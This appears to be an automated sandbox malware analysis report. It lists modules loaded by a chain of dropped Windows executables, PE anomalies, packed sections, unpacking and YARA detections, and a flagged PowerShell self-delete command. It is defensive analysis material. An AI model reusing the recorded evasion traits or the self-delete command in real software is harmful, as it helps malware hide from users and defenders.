                            Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                            Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\explorer.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\explorer.exeSection loaded: sspicli.dll
                            Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                            Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                            Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                            Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                            Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                            Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\explorer.exeSection loaded: amsi.dll
                            Source: C:\Windows\explorer.exeSection loaded: profapi.dll
                            Source: C:\Windows\explorer.exeSection loaded: msasn1.dll
                            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\explorer.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                            Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                            Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                            Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: webio.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: dpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: wbemcomn.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015822001\cad620f7d1.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rasapi32.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rasman.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rtutils.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: winhttp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: winnsi.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: rasadhlp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: fwpuclnt.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: secur32.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: schannel.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: mskeyprotect.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ntasn1.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ncrypt.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: ncryptsslp.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Roaming\IsStopped.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: winmm.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: iphlpapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: dnsapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: windows.storage.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: windowscodecs.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: napinsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: pnrpnsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: wshbth.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: nlaapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\1015823001\e42ef86dbf.exeSection loaded: winrnr.dll
                            Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
                            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Users\user\AppData\Local\Temp\1015781001\sUSFJjY.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: file.exeStatic file information: File size 3026432 > 1048576
                            Source: file.exeStatic PE information: Raw size of ptiuyvxt is bigger than: 0x100000 < 0x2b1400
                            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdbSHA256}Lq source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmp
                            Source: Binary string: protobuf-net.pdb source: sUSFJjY.exe, 00000006.00000002.2656456541.0000026961215000.00000004.00000800.00020000.00000000.sdmp, sUSFJjY.exe, 00000006.00000002.2618401542.000002694F270000.00000004.08000000.00040000.00000000.sdmp

                            Data Obfuscation

                            barindex
                            Detected unpacking (changes PE section rights)
                            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.ec0000.0.unpack :EW;.rsrc:W;.idata :W;ptiuyvxt:EW;izyqsoku:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ptiuyvxt:EW;izyqsoku:EW;.taggant:EW;
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 1.2.skotes.exe.700000.0.unpack :EW;.rsrc:W;.idata :W;ptiuyvxt:EW;izyqsoku:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ptiuyvxt:EW;izyqsoku:EW;.taggant:EW;
                            .NET source code contains potential unpacker
                            Source: sUSFJjY[1].exe.5.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                            Source: sUSFJjY.exe.5.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                            Source: IsStopped.exe.6.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                            Source: 6.2.sUSFJjY.exe.269612157b0.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                            Source: 6.2.sUSFJjY.exe.269612157b0.3.raw.unpack, ListDecorator.cs.Net Code: Read
                            Source: 6.2.sUSFJjY.exe.269612157b0.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                            Source: 6.2.sUSFJjY.exe.269612157b0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                            Source: 6.2.sUSFJjY.exe.269612157b0.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                            Suspicious powershell command line found
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                            Source: C:\Users\user\AppData\Local\Temp\main\in.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
                            Yara detected Costura Assembly Loader
                            Source: Yara matchFile source: 6.2.sUSFJjY.exe.269629be4b8.8.raw.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000006.00000002.2619824711.0000026950D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000027.00000002.2949152235.0000023B00073000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000027.00000002.2949152235.0000023B000D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000006.00000002.2656456541.0000026962821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: sUSFJjY.exe PID: 1260, type: MEMORYSTR
                            Source: C:\Users\user\AppData\Local\Temp\1015819001\XpAg0vN.exeCode function: 7_2_00402981 GetVersionExA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_00402981
                            Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                            Source: random[2].exe0.5.drStatic PE information: real checksum: 0x1cb583 should be: 0x1d1ed9
                            Source: IsStopped.exe.6.drStatic PE information: real checksum: 0x0 should be: 0x1f632
                            Source: sUSFJjY[1].exe.5.drStatic PE information: real checksum: 0x0 should be: 0x1f632
                            Source: eb571902cc.exe.5.drStatic PE information: real checksum: 0x1ce04e should be: 0x1c6cd5
                            Source: random[3].exe0.5.drStatic PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
                            Source: 84d98ae8ad.exe.5.drStatic PE information: real checksum: 0x1cb583 should be: 0x1d1ed9
                            Source: random[2].exe1.5.drStatic PE information: real checksum: 0x1ce04e should be: 0x1c6cd5
                            Source: sUSFJjY.exe.5.drStatic PE information: real checksum: 0x0 should be: 0x1f632
                            Source: skotes.exe.0.drStatic PE information: real checksum: 0x2ebe5b should be: 0x2e4fb7
                            Source: 8d37f89c6f.exe.5.drStatic PE information: real checksum: 0x2b67eb should be: 0x2b1046
                            Source: random[1].exe.5.drStatic PE information: real checksum: 0x450bab should be: 0x44d836
                            Source: d0e065d272.exe.5.drStatic PE information: real checksum: 0x1cb0e2 should be: 0x1cd51f
                            Source: e42ef86dbf.exe.5.drStatic PE information: real checksum: 0x450bab should be: 0x44d836
                            Source: file.exeStatic PE information: real checksum: 0x2ebe5b should be: 0x2e4fb7
                            Source: 6351911f1d.exe.5.drStatic PE information: real checksum: 0x4505f2 should be: 0x4495f4
                            Source: random[3].exe.5.drStatic PE information: real checksum: 0x2b67eb should be: 0x2b1046
                            Source: random[1].exe0.5.drStatic PE information: real checksum: 0x4505f2 should be: 0x4495f4
                            Source: file.exeStatic PE information: section name:
                            Source: file.exeStatic PE information: section name: .idata
                            Source: file.exeStatic PE information: section name: ptiuyvxt
                            Source: file.exeStatic PE information: section name: izyqsoku
                            Source: file.exeStatic PE information: section name: .taggant
                            Source: skotes.exe.0.drStatic PE information: section name:
                            Source: skotes.exe.0.drStatic PE information: section name: .idata
                            Source: skotes.exe.0.drStatic PE information: section name: ptiuyvxt
                            Source: skotes.exe.0.drStatic PE information: section name: izyqsoku
                            Source: skotes.exe.0.drStatic PE information: section name: .taggant
                            Source: random[1].exe.5.drStatic PE information: section name:
                            Source: random[1].exe.5.drStatic PE information: section name: .idata
                            Source: random[1].exe.5.drStatic PE information: section name:
                            Source: random[1].exe.5.drStatic PE information: section name: tvjsubtq
                            Source: random[1].exe.5.drStatic PE information: section name: qahvagxv
                            Source: random[1].exe.5.drStatic PE information: section name: .taggant
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name:
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name: .idata
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name:
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name: tvjsubtq
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name: qahvagxv
                            Source: e42ef86dbf.exe.5.drStatic PE information: section name: .taggant
                            Source: random[1].exe0.5.drStatic PE information: section name:
                            Source: random[1].exe0.5.drStatic PE information: section name: .idata
                            Source: random[1].exe0.5.drStatic PE information: section name:
                            Source: random[1].exe0.5.drStatic PE information: section name: puwxqisl
                            Source: random[1].exe0.5.drStatic PE information: section name: mgfajjwd
                            Source: random[1].exe0.5.drStatic PE information: section name: .taggant
                            Source: 6351911f1d.exe.5.drStatic PE information: section name:
                            Source: 6351911f1d.exe.5.drStatic PE information: section name: .idata
                            Source: 6351911f1d.exe.5.drStatic PE information: section name:
                            Source: 6351911f1d.exe.5.drStatic PE information: section name: puwxqisl
                            Source: 6351911f1d.exe.5.drStatic PE information: section name: mgfajjwd
                            Source: 6351911f1d.exe.5.drStatic PE information: section name: .taggant
                            Source: random[2].exe0.5.drStatic PE information: section name:
                            Source: random[2].exe0.5.drStatic PE information: section name: .idata
                            Source: random[2].exe0.5.drStatic PE information: section name:
                            Source: random[2].exe0.5.drStatic PE information: section name: yoxsliso
                            Source: random[2].exe0.5.drStatic PE information: section name: cztlhsvn
                            Source: random[2].exe0.5.drStatic PE information: section name: .taggant
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name:
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: .idata
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name:
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: yoxsliso
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: cztlhsvn
                            Source: 84d98ae8ad.exe.5.drStatic PE information: section name: .taggant
                            Source: random[2].exe1.5.drStatic PE information: section name:
                            Source: random[2].exe1.5.drStatic PE information: section name: .idata
                            Source: random[2].exe1.5.drStatic PE information: section name:
                            Source: random[2].exe1.5.drStatic PE information: section name: skauaiwm
                            Source: random[2].exe1.5.drStatic PE information: section name: npkvhzbc
                            Source: random[2].exe1.5.drStatic PE information: section name: .taggant
                            Source: eb571902cc.exe.5.drStatic PE information: section name:
                            Source: eb571902cc.exe.5.drStatic PE information: section name: .idata
                            Source: eb571902cc.exe.5.drStatic PE information: section name:
                            Source: eb571902cc.exe.5.drStatic PE information: section name: skauaiwm
